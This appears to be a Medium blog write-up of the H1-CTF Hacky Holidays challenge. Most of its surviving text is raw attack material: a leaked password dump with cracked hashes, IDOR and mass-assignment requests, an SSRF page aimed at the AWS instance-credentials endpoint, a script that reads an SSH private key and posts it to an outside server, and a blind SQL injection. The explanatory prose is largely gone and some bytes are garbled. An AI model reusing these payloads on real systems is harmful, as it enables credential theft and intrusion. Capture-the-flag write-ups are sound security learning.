H1-CTF Hacky Holidays Writeup

Part One

<b>Warning</b>:  Undefined array key "password" in <b>/var/www/html/public/_harvester_/code/harvest.php</b> on line <b>19</b><br />
INSERT INTO `users` (`id`, `username`, `password`, `salt`, `locked`) VALUES 
(1, 'bob', '5de402c02cbf657370d179808f26d450', '564315833g', 1),
(2, 'jim', '2309467bac72082e270195f5a43303d0', 'angelae', 1),
(3, 'grinch', '0273f802f2882bcd5daf8f08a3fee512','pare���㞷�
2309467bac72082e270195f5a43303d0:angelae:austin 5de402c02cbf657370d179808f26d450:564315833g:freedom

Part Two

Part-Two Summary
$.get('api/name?id=2',function(resp){
$('#name').html( resp.value );
});
$.get('api/address?id=c81e728d9d4c2f636f067f89cc14862c',function(resp){
$('#address').html( resp.value );
});
$.get('api/position?id=eyJ1c2VyX2lkIjoyfQ==',function(resp){
$('#position').html( resp.value );
});
$.get('api/image',function(resp){
$('#profilepic').attr('src',resp.value );
});
$.get('api/salary?id=2',function(resp){
$('#salary').html( resp.value );
});
$.get('api/dob?id=2',function(resp){
$('#dob').html( resp.value );
});
  • id=1 in api/name ,
  • api/address?id=md5(1),
  • api/position?id=base64_encode({“user_id”:1})
  • /api/image Cookie: id=1
  • dob?id=1&id=2
  • PUT /staff_info/api/salary?id=1
{"message":"Payment Received, account upgraded"}
default.get("https://intranet.hackyholidays.h1ctf.com/api/christmasList",{headers:{Authorization:'Bearer MjJlNzA1ZDY4OWZiYzE4MTk5Mjc2NzgwNDU2MGQ0YTYgIC0K'},params:{flag:!1}})
GET /api/christmasList?flag=true HTTP/1.1 
Host: intranet.hackyholidays.h1ctf.com
Authorization:Bearer MjJlNzA1ZDY4OWZiYzE4MTk5Mjc2NzgwNDU2MGQ0YTYgIC0K

Part Three

POST  /p/../v1/users/5 HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 34
email=akshansh%40example.com=>graham.rinch@this.is.h1.101.h1ctf.com"
POST /settings/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Cookie: candc_token=319fdd7782e96b43d5da3c5ce7be6e98
password=akshansh5%40this.is.h1.101.h1ctf.com&role=admin
POST /register/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
email=akshansh51%40this.is.h1.101.h1ctf.com&password=akshansh51%40this.is.h1.101.h1ctf.com&c_password=akshansh51%40this.is.h1.101.h1ctf.com&role=admin
<!DOCTYPE html>
<html>
<body onload=window.location='http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance'>
</body>
</html>
<script>
async function getc2serverdata(){
response = await fetch('https://c2.hackyholidays.h1ctf.com/~/.ssh/id_rsa');
resp_value = await response.text();
await fetch('http://myserver.com', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
body: JSON.stringify({
'ssrf_data': resp_value
})
});
}
send();
</script>
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/grinch-networks-two/directory-protector
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
remote = origin
merge = refs/heads/main
Day Eleven Flag: Come back tomorrow for more fun :)
Request Blocked using Directory Protector
private function expectedKeyword($codewords){
$words = explode(PHP_EOL,file_get_contents($codewords));
$line = intval(date("G")) + intval(date("i"));
return $words[$line];
}
<?php$codewrd = explode("\n",file_get_contents("code.txt"));
$line = intval(date("G")) + intval(date("i"));
echo json_encode(array("authorised"=> true,"codeword"=> $codewrd[$line], "timezone" => date_default_timezone_get(),"G"=> date("G"), "i"=> date("i"), "line"=> $line));
GET /infrastructure_management/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Cookie: authorisation_token=eyJzZXJ2ZXIiOiAiZXhhbXBsZS5jb20vY2hhbGwucGhwIyIsICJ0b2tlbiI6ICJhIn0=
<script>let users = {};
$.get('../get_column?column=username',function(resp){
$.each(resp,function(k,v){
users[v] = true;
});
console.log(users);
});
$('.loginfrm').click(function(){
let u = $('input[name="username"]').val();
if( !users.hasOwnProperty(u) ){
alert('Username cannot be found');
return false;
}
});</script>
</body>
  • username- grinch
  • password 40bf586cb6c1c1bab623ace03dc6b6fb the password was of no use we only got the username which can be used .
GET /infrastructure_management/get_column?column=SUBSTR((SELECT+INFO+FROM+information_schema.PROCESSLIST+WHERE+INFO+LIKE+'SELECT+*,SLEE%25'),1,10)

--

--

--

Security is Fun

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Installing Ubuntu over 17000 KM distance using MAAS, VxLAN & Tailscale

Python Tips for Leetcode Questions

Fun Driven Development with PHPSpec

Understanding my self and realising I am not as smart as I thought I was. But that is ok!!

Player Boundaries in Unity

Algorithm Interview Questions 20

[LeetCode] 1816. Truncate Sentence (Swift)

Introducing the Build Manager

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akshansh JaisWal

Akshansh JaisWal

Security is Fun

More from Medium

Privilege Escalation Using Token Impersonation | Windows |

Hack the box: backdoor write-up

Hack into Skynet —  Real World CTF (2022) walkthrough

HTB: Silo Writeup w/o Metasploit